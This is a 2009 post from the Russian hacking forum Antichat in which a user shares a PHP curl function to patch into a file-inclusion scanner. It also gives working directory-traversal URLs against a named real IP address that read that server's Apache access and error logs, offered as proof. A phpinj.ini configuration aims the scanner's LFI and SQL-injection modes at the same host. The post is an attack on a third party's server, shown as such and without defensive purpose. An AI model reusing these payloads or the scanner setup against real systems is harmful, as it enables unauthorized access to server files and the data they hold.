Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
08.07.2009, 12:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Если камушек в мой огород, то просто добавляем функцию получения информации через курлы:
PHP код:
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.1) Gecko/2008070208');
$ss=curl_exec($ch);
curl_close($ch);
return $ss;
}
и везде в коде scan меняем на get, и всё пашет, вот доказательства:
Код:
http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../var/log/apache2/access_log
http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../var/log/apache2/error_log
просто через fsockopen не всегда почему-то дает парсить
phpinj.ini для конкретно данного случая:
Код:
;=========================================
MODE = 1 ; <= режим сканирования
;MODE = 1 - имеется LFI, при неправильном запросе ВИДЕН текст ошибки
;MODE = 2 - имеется LFI, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 3 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе ВИДЕН текст ошибки
;MODE = 4 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 5 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе ВИДЕН текст ошибки
;MODE = 6 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;=========================================
; url-для сканирования (начало)
;----------------------------------------------------------------------------------------------------
URL = "http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../"
;----------------------------------------------------------------------------------------------------
; url, которая вызывает ошибку
;----------------------------------------------------------------------------------------------------
ERROR_URL = ""
;----------------------------------------------------------------------------------------------------
; окончание url-для сканирования
;----------------------------------------------------------------------------------------------------
URL_END = ""
;----------------------------------------------------------------------------------------------------
; Текст ошибки, при вызове ошибочной страницы, четко показывающая, что искомый параметр не найден (если ошибки видны)
;----------------------------------------------------------------------------------------------------
ERROR_MESSAGE = Error
;----------------------------------------------------------------------------------------------------
PAUSE = 0 ; Пауза между запросами
Но с курлами будет работать только .php, .exe пахать не будет
Последний раз редактировалось Pashkela; 08.07.2009 в 13:02..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид